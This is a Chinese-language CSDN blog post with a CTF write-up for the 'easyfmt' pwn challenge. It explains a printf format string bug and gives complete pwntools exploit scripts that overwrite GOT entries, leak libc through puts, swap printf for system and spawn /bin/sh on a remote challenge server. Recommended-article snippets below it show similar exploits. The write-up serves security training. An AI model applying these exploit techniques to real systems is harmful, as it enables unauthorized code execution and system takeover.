攻防世界easyfmt

最新推荐文章于 2024-06-05 21:44:07 发布
最新推荐文章于 2024-06-05 21:44:07 发布
阅读量287 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/needlebulb/article/details/125244203
版权 
if ( (unsigned int)CheckIn() == 1 )
  {
    memset(&buf, 0, 0x100uLL);
    write(1, "slogan: ", 9uLL);
    read(0, &buf, 0x100uLL);
    printf(&buf, &buf, argv);
  }

由以上代码可知printf处存在格式化字符串漏洞,但前提是要先过CheckIn()函数的判断LOWORD(v3[0]) = (unsigned __int8)(rand() % 5 + 48);

可知checkin()中生成0-4中任意一个数,猜对了便可以过判断,五分之一的概率很高,这里代码就不写自动尝试的功能了(主要太懒)。

主要思路为猜对后利用格式化字符串漏洞改写exit的got地址变成main函数过checkIn函数判断后的地址,这样就可以让程序反复执行且跳过猜数环节,然后格式化泄露puts的got地址,找到libc偏移,得到system地址,第三次循环改写printf的got变为system地址,第四次循环read时写入/bin/sh,完成getshell。

格式化字符串可以手写构造,但我用pwntool的fmtstr_payload自动构造,会方便点(老懒狗了),语法payload = fmtstr_payload(偏移,{你要改的地址,你想让他变成的地址})

-0000000000000030 var_30          dq 2 dup(?)
-0000000000000020 buf             dq ?
-0000000000000018 var_18          dw ?

看到buf离栈顶0x10,加上64位的五个寄存器,偏移应该为8

验证:

虽然一开始偏移是8,但不代表之后偏移都是8,之后的偏移由于每次call exit函数都会把该指令的下一个指令地址压栈供之后rip读取并返回继续运行,所以每循环一次偏移要加一。这里可以用gdb attach验证。

先让程序进入第二次循环,interactive()让其停下运行

from pwn import *
context(arch = "amd64",os= "linux")#注意标明64位,不然默认32位构造fmtstr_payload
context.log_level = 'debug'
a = process('./easyfmt')
elf = ELF('./easyfmt')
exit_plt = elf.plt['exit']
exit_got = elf.got['exit']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
read_got = elf.got['read']
printf_got = elf.got['printf']
main_addr = 0x400999
a.sendlineafter('enter','1')
payload = fmtstr_payload(8,{exit_got:main_addr})
print(payload)
a.sendlineafter('slogan: ',payload)
a.interactive()

 运行程序,ps -aux找到easyfmt的pid,用gdb attach pid查看

程序停在了第二次循环的read函数中,栈顶第一个为0x4009d0为call read的下一个指令,等read结束就会pop给rip,栈顶第二个是0x4009f8为call exit的下一个,由于被改写,他永远不会被pop出来了,造成了每次循环栈上都多了一个指令地址,导致偏移要加一。

此题就这一处坑,调试后很容易发现原因,以下是完整exp:

from pwn import *
from LibcSearcher import *
context(arch = "amd64",os= "linux")
context.log_level = 'debug'
a = remote("111.200.241.244",56072)
elf = ELF('./easyfmt')
exit_plt = elf.plt['exit']
exit_got = elf.got['exit']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
read_got = elf.got['read']
printf_got = elf.got['printf']
main_addr = 0x400999
a.sendlineafter('enter','1')
payload = fmtstr_payload(8,{exit_got:main_addr})
print(payload)
a.sendlineafter('slogan: ',payload)
payload = b'%10$sbbb' + p64(puts_got)
a.sendafter(b'slogan: \x00',payload)
puts_addr = u64(a.recvuntil(b'bbb')[:-3:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc = LibcSearcher('puts',puts_addr)
offset = puts_addr - libc.dump('puts')
system_addr = libc.dump('system') + offset
print(hex(system_addr))
payload = fmtstr_payload(10,{printf_got:system_addr})
a.sendlineafter('slogan: ',payload)
a.sendlineafter('slogan: ','/bin/sh')
a.interactive()

 

needlebulb
关注
easyfmt(xctf)
weixin_43868725的博客
08-20 470
0x0 程序保护和流程 保护: 流程: main() 可以发现在if中存在格式化字符串漏洞。但需要通过CheckIn()的返回值决定是否执行if中的语句。 通过一个time()获取当前时间,并将当前时间当成srand()的seed,之后根据seed产生出的随机数对5取模再加48存放在v3[0]中,之后将输入的值跟v1进行比较返回结果。 0x1 利用过程 1.想要利用格式化字符串漏洞就必须绕过CheckIn()的限制,因为反汇编出来的源码可能会有一点问题,因此对汇编代码进行分析。 通过分析可知程序将随
攻防世界(pwn)easyfmt
PLpa的博客
03-02 1106
这题出的很奇怪,本地调试不知道为什么出问题,远程也调了很久才通,希望路过的大佬提出更好的思路和解题方式! 查看一下保护: 开了canary,NX,部分打开RELRO,没开PIE,可以尝试got表的覆盖。 这里不能有时候全信,还是要打开IDA自己分析才行。 可以看到有明显的格式化字符串漏洞,看看怎么利用他。 要运行到格式化字符串漏洞,我们必须完成一个判定,我们进入CheckIn函数看看。 Ch...
攻防世界PWN之easy_fmt题解
seaaseesa的博客
02-05 2594
Easyfmt 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 存在一个明显的格式化字符串漏洞,但是只能用一次,后面exit(0)会结束程序 CheckIn需要爆破 是一个随机数,且只有一位,我们直接输入2,成功率1/10 为了不让程序退出,多次利用printf,我们就得利用第一次的printf把exit的got表内容修改为0x400982,这样,我们就能一直处于...
wdb_2018_2nd_easyfmt
weixin_43904731的博客
12-14 493
wdb_2018_2nd_easyfmt(格式化字符串)
[XCTF-pwn] 25_easyfmt
weixin_52640415的博客
03-08 472
格式化字符串漏洞,got.exit劫持,got.printf劫持 这题比上题要简单,先修改got.exit为main进入循环并漏洞libc地址,再将printf改为system,再输入/bin/sh int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[264]; // [rsp+10h] [rbp-110h] BYREF unsigned __int64 v4; // [r
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
格式化字符串漏洞的介绍
01-20
自己学习的时候做的一个ppt,是花了一些心血的,希望对别人能够有所帮助。主要是格式化字符串漏洞的一些介绍,还是挺详细的。
攻防世界 easyvm
weixin_43798872的博客
12-06 508
攻防世界 进阶 easyvm
pwn 网鼎杯 easyFMT
SsMing的博客
09-01 2039
作为一个菜狗子只能等大佬的writeup学习   才会做 easyFMT看名字就是到是格式化串洞,然后就是要确定存在格式化串洞的参数是第几个 确定为是print的第六个参数 大佬计算参数的脚本是: #!/usr/bin/python from pwn import * elf = ELF('./pwn') for i in xrange(1,100): p = proce...
攻防世界——easy_web详解
最新发布
chinese_cabbage0的博客
06-05 560
文章很好的解释了ssti注入的原理和攻防世界上easy_web这个题目的详细解答
wdb_2018_2nd_easyfmt详解
像初雪一样自由洒落
04-25 1718
wdb_2018_2nd_easyfmt详解 自己做出来了,,,,还看其他人的 参考:wdb_2018_2nd_easyfmt 程序流程 程序流程非常简单,可以一直进行格式化字符串漏洞。 漏洞利用 首先通过格式化字符串泄露栈信息 通过格式化字符串修改printf_got表为system(one_gadget本地打通了,远程没有,,) 发送“/bin/sh\x00”, 详细过程 0.查看基本信息 32位程序,只开了nx winter@ubuntu:~/buu$ file wdb_2018_2nd_e.
XCTF easyCpp
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-18 497
查壳 无壳,64位Linux程序 放入IDA中分析 查看Main函数 这里拿加密后的用户输入和程序生成的前16个斐波那契数列进行对比 ,不相等则退出程序,相等的话则继续往下执行 所以说只需要逆推出input_encry是如何生成的,既可以得到flag 这里是把&input_begin存到&input_encry 从头开始分析&input_begin是如何生成的 这里...
[BUUCTF-pwn]——wdb_2018_2nd_easyfmt
Y_peak的博客
03-17 689
[BUUCTF-pwn]——wdb_2018_2nd_easyfmt 一个简单的格式化字符串利用问题 泄露出got表地址,找到libc基地址 寻找system的实际地址 将printf_got修改为system的地址 写入”/bin/sh" exploit from pwn import * from LibcSearcher import * context.log_level = "debug" p = remote('node3.buuoj.cn',25125) #p = process("./
BUUCTF(pwn)wdb_2018_2nd_easyfmt
半岛铁盒的博客
04-03 516
32位格式化字符串修改got表 做题思路 找到格式化字符的偏移量 打印print@got的地址,泄露libc,计算system的地址 将print@got修改成system,传入参数‘/bin/sh\0’ from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',29087) elf=ELF('./1') printf_got=elf.got['printf'] payload1=p32(printf_got)+"%6$s"
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值